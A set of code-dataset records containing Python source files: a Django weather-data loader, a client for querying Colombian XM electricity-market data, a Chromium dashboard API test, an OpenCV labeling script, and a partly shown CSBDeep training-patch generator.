"call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "jsonfield.JSONField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 51, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 53, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 53, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 56, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 56, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 57, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "293520547", "text": "from meteo.models import MeteoValue\nimport datetime\nimport pytz\ntz = pytz.timezone(\"Europe/Paris\")\n\n\ndef check():\n\tdata = MeteoValue.objects.all()\n\ti = 0\n\tfor sset in data:\n\t\ti += 1\n\t\tprint(str(type(sset.date)) + \" \" + str(sset.date) + \" \" + str(sset.date.astimezone(tz)))\n\t\tif i > 10:\n\t\t\tbreak\n\n\ndef pop():\n\tMeteoValue.objects.all().delete()\n\tf = open(\"data.log\")\n\tlines = f.readlines()\n\tf.close()\n\ti = 0\n\tstart = 0\n\tfor line in lines:\n\t\ti += 1\n\t\tline = line.strip()\n\t\tif len(line) == 0:\n\t\t\tcontinue\n\t\tif line.startswith(\"date\"):\n\t\t\tcontinue\n\t\tif line.startswith(\"id\"):\n\t\t\tstart = 1\n\t\t\tcontinue\n\t\titems = line.split()\n\t\tdatentime = items[start] + \" \" + items[start + 1]\n\t\tdt = datetime.datetime.strptime(datentime, \"%Y-%m-%d %H:%M:%S\")\n\t\tdtt = dt.astimezone(tz)\n\t\tm = MeteoValue(date=dtt, server_room_temperature=float(items[start + 2]), server_room_humidity=float(items[start + 3]))\n\t\tm.save()\n\t\t#if i >= 100:\n\t\t#\tbreak\n\n\nif __name__ == \"__main__\":\n\tpop()\n", "sub_path": "old/www/www/populate.py", "file_name": "populate.py", "file_ext": "py", "file_size_in_byte": 958, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytz.timezone", "line_number": 4, "usage_type": "call"}, {"api_name": "meteo.models.MeteoValue.objects.all", "line_number": 8, "usage_type": "call"}, {"api_name": "meteo.models.MeteoValue.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": 
"meteo.models.MeteoValue", "line_number": 8, "usage_type": "name"}, {"api_name": "meteo.models.MeteoValue.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "meteo.models.MeteoValue.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "meteo.models.MeteoValue", "line_number": 18, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "meteo.models.MeteoValue", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "604522588", "text": "from pydataxm import ReadDB\nimport pandas as pd\nimport datetime as dt\n\ninven_met = {'Recursos': {'freq': ['Horaria', 'Diaria'],\n 'Horaria': {'var': {'Generacion Ideal': ['GeneIdea', 1],\n 'Generacion Real': ['Gene', 1],\n 'Consumo Combustible Aprox. Factor de Emisión': ['ConsCombustibleMBTU', 0],\n 'Precio de Oferta del Despacho': ['PrecOferDesp', 0],\n 'Emisiones CO2e': ['EmisionesCO2Eq', 0],\n 'Generación Seguridad': ['GeneSeguridad', 0],\n 'Generación Fuera de Merito': ['GeneFueraMerito', 0]\n },\n 'join_var': ['Id', 'Values_code', 'Date', 'Hour']\n },\n 'Diaria': {'var': {'Obligaciones de Energía Firme':['ObligEnerFirme', 0]},\n 'join_var':['Id', 'Code', 'Date']\n }\n },\n\n 'Recursos_Combinados': {'freq': ['Horaria'],\n 'Horaria': {'var': {'Consumo Comb Aprox.': ['ConsCombAprox', 0],\n 'Emisiones CO2': ['EmisionesCO2', 0],\n 'Emisiones CH4': ['EmisionesCH4', 0],\n 'Emisiones N2O': ['EmisionesN2O', 0]\n },\n 'join_var': ['Id', 'Values_code', 'Values_Name', 'Date', 'Hour']\n }\n },\n\n 'Agentes': {'freq':['Horaria'],\n 'Horaria': {'var': {'Demanda Comercial': ['DemaCome', 1],\n 'Ventas en Contratos Energía': ['VentContEner', 1],\n 'Compras en Contratos Energía': ['CompContEner', 1],\n 'Compras en Bolsa Nacional Energía': ['CompBolsNaciEner', 1],\n 'Demanda por Operador de Red': ['DemaOR', 0]\n },\n 'join_var': ['Id', 'Values_code', 'Date', 'Hour']\n }\n },\n\n 'Sistema': {'freq': ['Horaria', 'Diaria', 'Anual'],\n 'Horaria': {'var': {'Generacion Ideal': ['GeneIdea', 0],\n 'Generacion Real': ['Gene', 0],\n 'Demanda Comercial': ['DemaCome', 0],\n 'Precio de Bolsa Nacional': ['PrecBolsNaci', 0],\n 'Máximo Precio de Oferta Nacional': ['MaxPrecOferNal', 0],\n 'Restricciones Aliviadas': ['RestAliv', 0],\n 'Ventas en Contratos Energía': ['VentContEner', 0],\n 'Compras en Contratos Energía': ['CompContEner', 0],\n 'Compras en Bolsa Nacional Energía': ['CompBolsNaciEner', 0],\n 'factor emision CO2e': ['factorEmisionCO2e', 0],\n 'Importaciones Energía': ['ImpoEner', 0],\n 'Perdidas en Energia': ['PerdidasEner', 0]\n },\n 'join_var': ['Id', 'Values_code', 'Date', 'Hour']\n },\n 'Diaria': {'var': {'Aportes Energia': ['AporEner', 0],\n 'Precio de Escasez de Activacion': ['PrecEscaAct', 0],\n 'Remuneración Real Ind. 
Cargo Confiabilidad': ['RemuRealIndiv', 0],\n 'Precio Promedio Contratos Regulado': ['PrecPromContRegu', 0],\n 'Precio Promedio Contratos NO Regulado': ['PrecPromContNoRegu', 0],\n 'Volumen Util Diario en Energia': ['VoluUtilDiarEner', 0],\n 'Demanda del SIN': ['DemaSIN', 0],\n 'Capacidad Util Diaria en Energia': ['CapaUtilDiarEner', 0],\n 'Media Historica Aportes': ['AporEnerMediHist', 0],\n 'FAZNI': ['FAZNI', 0],\n 'PRONE': ['PRONE', 0],\n 'FAER': ['FAER', 0]\n },\n 'join_var': ['Id', 'Date']\n },\n 'Anual': {'var': {'Listado de recursos térmicos CEN por mes':['CapEfecNeta', 0]},\n 'join_var': []\n }\n },\n\n\n 'Rios': {'freq': ['Diaria'],\n 'Diaria': {'var': {'Aportes Energia': ['AporEner', 1],\n 'Media Historica Aportes': ['AporEnerMediHist', 1]\n },\n 'join_var': ['Id', 'Name', 'Date']\n }\n },\n\n 'Embalses': {'freq': ['Diaria'],\n 'Diaria': {'var': {'Volumen Util Diario en Energia': ['VoluUtilDiarEner', 1],\n 'Capacidad Util Diaria en Energia': ['CapaUtilDiarEner', 1]\n },\n 'join_var': ['Id', 'Name', 'Date']\n }\n },\n\n\n 'Areas': {'freq': ['Diaria'],\n 'Diaria': {'var': {'Demanda No Atendida Programada por Área': ['DemaNoAtenProg', 0],\n 'Demanda No Atendida No Programada por Área': ['DemaNoAtenNoProg', 0]\n },\n 'join_var': ['Id', 'Name', 'Date']\n }\n },\n\n 'Subareas': {'freq': ['Diaria'],\n 'Diaria': {'var': {'Demanda No Atendida Programada por Subarea': ['DemaNoAtenProg', 1],\n 'Demanda No Atendida No Programada por Subarea': ['DemaNoAtenNoProg', 1]\n },\n 'join_var': ['Id', 'Name', 'Date']\n }\n }\n\n }\n\n\n\ninstances = {'Recursos': {'Id': 'id', 'Values_Value1': 'tipo_despacho',\n 'Values_Value2': 'tecnologia', 'Values_Value3': 'categoria',\n 'Values_code':'submercado', 'datetime': 'fecha_hora',\n 'Values_Name': 'Combustible', 'Values_code':'sub_mercado', 'Date': 'fecha'\n },\n 'Recursos_Combinados':{'Id': 'id', 'Values_Name':'sub_mercado', 'Values_code': 'Combustible'},\n 'Agentes': {'Id': 'id', 'Values_code':'submercado', 'datetime': 'fecha_hora'},\n 'Sistema': {'Id': 'id', 'datetime': 'fecha_hora', 'Date': 'fecha'},\n 'Rios': {'Id': 'id', 'Name': 'nombre','Date': 'fecha'},\n 'Embalses': {'Id': 'id', 'Name': 'nombre', 'Date': 'fecha'},\n 'Areas': {'Id': 'id', 'Name': 'nombre', 'Date': 'fecha'},\n 'Subareas': {'Id': 'id', 'Name': 'nombre', 'Date': 'fecha'}\n }\n\ntiempos = {'Values_Hour01': '00:00:00', 'Values_Hour02': '00:01:00',\n 'Values_Hour03': '00:02:00', 'Values_Hour04': '00:03:00',\n 'Values_Hour05': '00:04:00', 'Values_Hour06': '00:05:00',\n 'Values_Hour07': '00:06:00', 'Values_Hour08': '00:07:00',\n 'Values_Hour09': '00:08:00', 'Values_Hour10': '00:09:00',\n 'Values_Hour11': '00:10:00', 'Values_Hour12': '00:11:00',\n 'Values_Hour13': '00:12:00', 'Values_Hour14': '00:13:00',\n 'Values_Hour15': '00:14:00', 'Values_Hour16': '00:15:00',\n 'Values_Hour17': '00:16:00', 'Values_Hour18': '00:17:00',\n 'Values_Hour19': '00:18:00', 'Values_Hour20': '00:19:00',\n 'Values_Hour21': '00:20:00', 'Values_Hour22': '00:21:00',\n 'Values_Hour23': '00:22:00', 'Values_Hour24': '00:23:00'\n }\n\n\n\n\ndef queryToTable(var, index, sd, ed, freq):\n\n query = ReadDB() # Conect with the API\n d = query.request_data(var, index, sd, ed) # Do QUERY\n if len(d.columns) == 0: # Notify if a QUERY does not generate data\n print(f'No existen datos de {var} para estas fechas')\n else: # If QUERY generate data\n # Verify frequency\n if freq == 'Horaria':\n value_vars = list(d.loc[:, 'Values_Hour01':'Values_Hour24'])\n id_vars =[x for x in d.columns if x not in value_vars]\n d = 
d.melt(id_vars=id_vars, value_vars=value_vars,\n var_name='Hour', value_name=var)\n d[var] = pd.to_numeric(d[var])\n\n if freq == 'Diaria':\n d = query.request_data(var, index, sd, ed)\n d[var] = pd.to_numeric(d['Value'])\n d = d.drop(['Value'], axis=1)\n\n return d\n\ndef joinInfo(item_list, sd, ed, freq, join_var):\n\n d = pd.DataFrame()\n for var in item_list:\n if len(d.columns) == 0:\n d = queryToTable(var[0], var[1], sd, ed, freq)\n else:\n df = queryToTable(var[0], var[1], sd, ed, freq)\n if len(df.columns) > 0:\n d = pd.merge(d, df, on=join_var, how='outer')\n\n return d\n\n\ndef queryConstrain(item_list, sd, ed, freq, delta, join_var):\n ed = min(dt.date.today(), ed)\n\n if ed-sd <= delta:\n d = joinInfo(item_list, sd, ed, freq, join_var)\n else:\n dm = sd + delta\n d = joinInfo(item_list, sd, dm, freq, join_var)\n sd = dm\n dm = min(sd + delta, ed)\n while dm <= ed:\n df = joinInfo(item_list, sd, dm, freq, join_var)\n d = pd.concat([d, df], axis=0)\n sd = dm\n dm = sd + delta\n return d\n\n\ndef replace(dict, key):\n return dict[key]\n\n\n\ndef goodNames(d, item, freq):\n if freq == 'Horaria':\n d['Time'] = d['Hour'].apply(lambda x: replace(tiempos, x))\n d['datetime'] = d['Date'] + \" \" + d['Time']\n d['datetime'] = pd.to_datetime(d['datetime'])\n d = d.drop(['Hour'], axis=1)\n d = d.drop(['Time'], axis=1)\n d = d.drop(['Date'], axis=1)\n if item == 'Sistema':\n d = d.drop(['Values_code'], axis=1)\n if freq == 'Diaria':\n d['Date'] = pd.to_datetime(d['Date']).dt.date\n\n d = d.rename(columns=instances[item])\n return d\n\ndef findData(item, item_list, sd, ed, freq, join_var):\n\n d = joinInfo(item_list, sd, ed, freq, join_var)\n d = goodNames(d, item, freq)\n\n if item == 'Recursos':\n names = pd.read_csv('https://raw.githubusercontent.com/NNE-ISA/XM_API_to_data/main/info_nombres/recursos.csv')\n vars_join = [i for i in list(names.columns) if i in list(d.columns)]\n d = pd.merge(d, names, on= vars_join, how='left')\n if item == 'Agentes':\n names = pd.read_csv('https://raw.githubusercontent.com/NNE-ISA/XM_API_to_data/main/info_nombres/agentes.csv')\n vars_join = [i for i in list(names.columns) if i in list(d.columns)]\n d = pd.merge(d, names, on= vars_join, how='left')\n\n return d\n\n\ndef xmQueryAPI(item, sd, ed, freq, var=[], phat='./', save=False):\n global inven_met\n\n print('Se inicia la consulta')\n\n if not var:\n var = list(inven_met[item][freq]['var'].keys())\n\n join_var = inven_met[item][freq]['join_var']\n item_list = list([inven_met[item][freq]['var'][x] for x in var])\n\n if save:\n d = findData(item, item_list, sd, ed, freq, join_var)\n name = phat + '\\\\' + item + '_' + str(sd) + '__' + str(ed) + '.csv'\n\n try:\n d.to_csv(name, index = False)\n except:\n name = name.replace('\\\\','/')\n d.to_csv(name, index = False)\n\n print('se ha guardado la información correctamente')\n else:\n d = findData(item, item_list, sd, ed, freq, join_var)\n print('Se ha consultado la información con éxito')\n return d", "sub_path": "xm_query.py", "file_name": "xm_query.py", "file_ext": "py", "file_size_in_byte": 12998, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pydataxm.ReadDB", "line_number": 149, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 160, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 164, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.merge", 
"line_number": 178, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 184, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 196, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 211, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 218, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 233, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "235324614", "text": "# Copyright 2019 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport json\n\n# Importing mock_oauth2_decorator before file_bug mocks out\n# OAuth2Decorator usage in that file.\n# pylint: disable=unused-import\nfrom dashboard import mock_oauth2_decorator\n# pylint: enable=unused-import\n\nfrom dashboard.api import api_auth\nfrom dashboard.api import existing_bug\nfrom dashboard.common import testing_common\nfrom dashboard.models import anomaly\nfrom dashboard.models import graph_data\n\n\nclass ExistingBugTest(testing_common.TestCase):\n\n def setUp(self):\n super(ExistingBugTest, self).setUp()\n self.SetUpApp([('/api/existing_bug', existing_bug.ExistingBugHandler)])\n self.SetCurrentClientIdOAuth(api_auth.OAUTH_CLIENT_ID_ALLOWLIST[0])\n self.SetCurrentUserOAuth(None)\n testing_common.SetSheriffDomains(['example.com'])\n\n def _Post(self, **params):\n return json.loads(self.Post('/api/existing_bug', params).body)\n\n def testInvalidUser(self):\n self.Post('/api/existing_bug', status=403)\n\n def testSuccess(self):\n self.SetCurrentUserOAuth(testing_common.INTERNAL_USER)\n path = 'm/b/s/m/c'\n test = graph_data.TestMetadata(\n has_rows=True,\n id=path,\n improvement_direction=anomaly.DOWN,\n units='units')\n test.put()\n key = anomaly.Anomaly(test=test.key, start_revision=1, end_revision=1).put()\n graph_data.Row(id=1, parent=test.key, value=1).put()\n response = self._Post(key=key.urlsafe(), bug=12345)\n self.assertEqual({}, response)\n self.assertEqual(12345, key.get().bug_id)\n self.assertEqual('chromium', key.get().project_id)\n", "sub_path": "dashboard/dashboard/api/existing_bug_test.py", "file_name": "existing_bug_test.py", "file_ext": "py", "file_size_in_byte": 1805, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "dashboard.common.testing_common.TestCase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "dashboard.common.testing_common", "line_number": 24, "usage_type": "name"}, {"api_name": "dashboard.api.existing_bug.ExistingBugHandler", "line_number": 28, "usage_type": "attribute"}, {"api_name": "dashboard.api.existing_bug", "line_number": 28, "usage_type": "name"}, {"api_name": "dashboard.api.api_auth.OAUTH_CLIENT_ID_ALLOWLIST", "line_number": 29, "usage_type": "attribute"}, {"api_name": "dashboard.api.api_auth", "line_number": 29, "usage_type": "name"}, {"api_name": "dashboard.common.testing_common.SetSheriffDomains", "line_number": 31, "usage_type": "call"}, {"api_name": "dashboard.common.testing_common", "line_number": 31, 
"usage_type": "name"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "dashboard.common.testing_common.INTERNAL_USER", "line_number": 40, "usage_type": "attribute"}, {"api_name": "dashboard.common.testing_common", "line_number": 40, "usage_type": "name"}, {"api_name": "dashboard.models.graph_data.TestMetadata", "line_number": 42, "usage_type": "call"}, {"api_name": "dashboard.models.graph_data", "line_number": 42, "usage_type": "name"}, {"api_name": "dashboard.models.anomaly.DOWN", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dashboard.models.anomaly", "line_number": 45, "usage_type": "name"}, {"api_name": "dashboard.models.anomaly.Anomaly", "line_number": 48, "usage_type": "call"}, {"api_name": "dashboard.models.anomaly", "line_number": 48, "usage_type": "name"}, {"api_name": "dashboard.models.graph_data.Row", "line_number": 49, "usage_type": "call"}, {"api_name": "dashboard.models.graph_data", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "87711805", "text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage.filters import maximum_filter\nimport csv\nimport math\nfrom skimage.feature import peak_local_max\n\nframe = 200\n\n\ndef labeling(x_cen, y_cen):\n gro = cv2.imread('optbasis_graphcut.tif')\n gu = cv2.imread('gausian_00200.tif')\n gu = cv2.cvtColor(gu, cv2.COLOR_BGR2GRAY)\n gray = gro[:, :, 2]\n lab_img = np.zeros((gro.shape[0], gro.shape[1]))\n ret, bin = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n nLabels, labelImage = cv2.connectedComponents(bin)\n\n nLabels = nLabels - 1\n new_labels = 1\n id_list = np.zeros((0, 3))\n for i in range(x_cen.shape[0]):\n x_point = int(x_cen[i])\n y_point = int(y_cen[i])\n id = labelImage[x_point, y_point]\n lab_img[labelImage == id] = gu[labelImage == id]\n return new_labels, lab_img\n\n\ndef preprocessing():\n gro = cv2.imread('frame200.png')\n gray = cv2.cvtColor(gro, cv2.COLOR_BGR2GRAY)\n ret, bin = cv2.threshold(gray, gray.max() * 0.8, 255, cv2.THRESH_BINARY)\n nLabels, labelImage = cv2.connectedComponents(bin)\n x_cens = []\n y_cens = []\n mask = np.zeros((1040, 1392))\n for i in range(1, nLabels):\n x, y = np.where(labelImage == i)\n for j in range(x.shape[0]):\n if (x[j] != 1039) & (x[j] != 0) & (y[j] != 1391) & (y[j] != 0):\n if (gray[x[j], y[j]] >= gray[x[j] + 1, y[j]]) & (gray[x[j], y[j]] >= gray[x[j] - 1, y[j]]) & (\n gray[x[j], y[j]] >= gray[x[j], y[j] + 1]) & (gray[x[j], y[j]] >= gray[x[j], y[j] - 1]):\n x_cen = x[j]\n y_cen = y[j]\n mask[x[j], y[j]] = 255\n mask = mask.astype('uint8')\n nLabels, labelImage = cv2.connectedComponents(mask)\n\n for i in range(1, nLabels):\n x, y = np.where(labelImage == i)\n x_cen = 0\n y_cen = 0\n for j in range(x.shape[0]):\n x_cen += x[j]\n y_cen += y[j]\n x_cen = x_cen / x.shape[0]\n y_cen = y_cen / y.shape[0]\n x_cens = np.append(x_cens, x_cen)\n y_cens = np.append(y_cens, y_cen)\n return x_cens, y_cens\n\n\nif __name__ == \"__main__\":\n x_cen, y_cen = preprocessing()\n nlabels, label = labeling(x_cen, y_cen)\n plt.imshow(label[600:1000, 400:800]), plt.show()\n", "sub_path": "labeling.py", "file_name": "labeling.py", "file_ext": "py", "file_size_in_byte": 2323, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 15, "usage_type": "call"}, 
{"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.connectedComponents", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.connectedComponents", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.connectedComponents", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "130908938", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 27 13:07:18 2019\n\n@author: aimachine\n\"\"\"\n\nimport numpy as np\nfrom .helpers import normalizeFloat\nfrom glob import glob\nfrom tifffile import imread\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom stardist import random_label_cmap\nnp.random.seed(42)\nlbl_cmap = random_label_cmap()\nimport collections\nfrom itertools import chain\nfrom collections import namedtuple\nfrom skimage.transform import downscale_local_mean\nfrom stardist import fill_label_holes\nfrom sklearn.model_selection import train_test_split\ntry:\n from pathlib import Path\n Path().expanduser()\nexcept (ImportError,AttributeError):\n from pathlib2 import Path\n\ntry:\n import tempfile\n tempfile.TemporaryDirectory\n\nexcept (ImportError,AttributeError):\n from backports import tempfile\nfrom csbdeepLocal.data import create_patches, RawData,no_background_patches,norm_percentiles,shuffle_inplace,sample_patches_from_multiple_stacks\nfrom csbdeep.data.transform import Transform, permute_axes\nfrom csbdeep.utils import _raise, consume, compose, axes_dict, axes_check_and_normalize\nimport sys, warnings\ndef create_downsample_patches(\n raw_data,\n patch_size,\n n_patches_per_image,\n patch_axes = None,\n save_file = None,\n transforms = None,\n patch_filter = no_background_patches(),\n normalization = norm_percentiles(),\n shuffle = True,\n verbose = True,\n downsample_factor = 2\n ):\n \"\"\"Create normalized training data to be used for neural network training.\n Parameters\n ----------\n raw_data : :class:`RawData`\n Object that yields matching pairs of raw images.\n patch_size : tuple\n Shape of the patches to be extraced from raw images.\n Must be compatible with the number of dimensions and axes of the raw images.\n As a general rule, use a power of two 
along all XYZT axes, or at least divisible by 8.\n n_patches_per_image : int\n Number of patches to be sampled/extracted from each raw image pair (after transformations, see below).\n patch_axes : str or None\n Axes of the extracted patches. If ``None``, will assume to be equal to that of transformed raw data.\n save_file : str or None\n File name to save training data to disk in ``.npz`` format (see :func:`csbdeep.io.save_training_data`).\n If ``None``, data will not be saved.\n transforms : list or tuple, optional\n List of :class:`Transform` objects that apply additional transformations to the raw images.\n This can be used to augment the set of raw images (e.g., by including rotations).\n Set to ``None`` to disable. Default: ``None``.\n patch_filter : function, optional\n Function to determine for each image pair which patches are eligible to be extracted\n (default: :func:`no_background_patches`). Set to ``None`` to disable.\n normalization : function, optional\n Function that takes arguments `(patches_x, patches_y, x, y, mask, channel)`, whose purpose is to\n normalize the patches (`patches_x`, `patches_y`) extracted from the associated raw images\n (`x`, `y`, with `mask`; see :class:`RawData`). Default: :func:`norm_percentiles`.\n shuffle : bool, optional\n Randomly shuffle all extracted patches.\n verbose : bool, optional\n Display overview of images, transforms, etc.\n Returns\n -------\n tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`, str)\n Returns a tuple (`X`, `Y`, `axes`) with the normalized extracted patches from all (transformed) raw images\n and their axes.\n `X` is the array of patches extracted from source images with `Y` being the array of corresponding target patches.\n The shape of `X` and `Y` is as follows: `(n_total_patches, n_channels, ...)`.\n For single-channel images, `n_channels` will be 1.\n Raises\n ------\n ValueError\n Various reasons.\n Example\n -------\n >>> raw_data = RawData.from_folder(basepath='data', source_dirs=['source1','source2'], target_dir='GT', axes='ZYX')\n >>> X, Y, XY_axes = create_patches(raw_data, patch_size=(32,128,128), n_patches_per_image=16)\n Todo\n ----\n - Save created patches directly to disk using :class:`numpy.memmap` or similar?\n Would allow to work with large data that doesn't fit in memory.\n \"\"\"\n ## images and transforms\n if transforms is None:\n transforms = []\n transforms = list(transforms)\n if patch_axes is not None:\n transforms.append(permute_axes(patch_axes))\n if len(transforms) == 0:\n transforms.append(Transform.identity())\n\n\n image_pairs, n_raw_images = raw_data.generator(), raw_data.size\n tf = Transform(*zip(*transforms)) # convert list of Transforms into Transform of lists\n image_pairs = compose(*tf.generator)(image_pairs) # combine all transformations with raw images as input\n n_transforms = np.prod(tf.size)\n n_images = n_raw_images * n_transforms\n n_patches = n_images * n_patches_per_image\n n_required_memory_bytes = 2 * n_patches*np.prod(patch_size) * 4\n\n ## memory check\n _memory_check(n_required_memory_bytes)\n\n ## summary\n if verbose:\n print('='*66)\n print('%5d raw images x %4d transformations = %5d images' % (n_raw_images,n_transforms,n_images))\n print('%5d images x %4d patches per image = %5d patches in total' % (n_images,n_patches_per_image,n_patches))\n print('='*66)\n print('Input data:')\n print(raw_data.description)\n print('='*66)\n print('Transformations:')\n for t in transforms:\n print('{t.size} x {t.name}'.format(t=t))\n print('='*66)\n print('Patch size:')\n 
print(\" x \".join(str(p) for p in patch_size))\n print('=' * 66)\n\n sys.stdout.flush()\n\n ## sample patches from each pair of transformed raw images\n X = np.empty((n_patches,)+tuple(patch_size),dtype=np.float32)\n Y = np.empty_like(X)\n\n for i, (x,y,_axes,mask) in tqdm(enumerate(image_pairs),total=n_images,disable=(not verbose)):\n if i >= n_images:\n warnings.warn('more raw images (or transformations thereof) than expected, skipping excess images.')\n break\n if i==0:\n axes = axes_check_and_normalize(_axes,len(patch_size))\n channel = axes_dict(axes)['C']\n # checks\n # len(axes) >= x.ndim or _raise(ValueError())\n axes == axes_check_and_normalize(_axes) or _raise(ValueError('not all images have the same axes.'))\n x.shape == y.shape or _raise(ValueError())\n mask is None or mask.shape == x.shape or _raise(ValueError())\n (channel is None or (isinstance(channel,int) and 0<=channel>> !tree data\n data\n ├── GT\n │ ├── imageA.tif\n │ ├── imageB.tif\n │ └── imageC.tif\n ├── source1\n │ ├── imageA.tif\n │ └── imageB.tif\n └── source2\n ├── imageA.tif\n └── imageC.tif\n >>> data = RawData.from_folder(basepath='data', source_dirs=['source1','source2'], target_dir='GT', axes='YX')\n >>> n_images = data.size\n >>> for source_x, target_y, axes, mask in data.generator():\n ... pass\n \"\"\"\n p = Path(basepath)\n pairs = [(f, p/target_dir/f.name) for f in chain(*((p/source_dir).glob(pattern) for source_dir in source_dirs))]\n len(pairs) > 0 or _raise(FileNotFoundError(\"Didn't find any images.\"))\n consume(t.exists() or _raise(FileNotFoundError(t)) for s,t in pairs)\n axes = axes_check_and_normalize(axes)\n n_images = len(pairs)\n description = \"{p}: target='{o}', sources={s}, axes='{a}', pattern='{pt}'\".format(p=basepath, s=list(source_dirs),\n o=target_dir, a=axes, pt=pattern)\n\n def _gen():\n for fx, fy in pairs:\n x, y = imread(str(fx)), imread(str(fy))\n x = downscale_local_mean(x, (downsample_factor, downsample_factor))\n y = downscale_local_mean(y, (downsample_factor, downsample_factor))\n len(axes) >= x.ndim or _raise(ValueError())\n yield x, y, axes[-x.ndim:], None\n\n return RawData(_gen, n_images, description)\n\n\n\n @staticmethod\n def from_arrays(X, Y, axes='CZYX'):\n \"\"\"Get pairs of corresponding images from numpy arrays.\"\"\"\n\n def _gen():\n for x, y in zip(X ,Y):\n len(axes) >= x.ndim or _raise(ValueError())\n yield x, y, axes[-x.ndim:], None\n\n return RawData(_gen, len(X), \"numpy 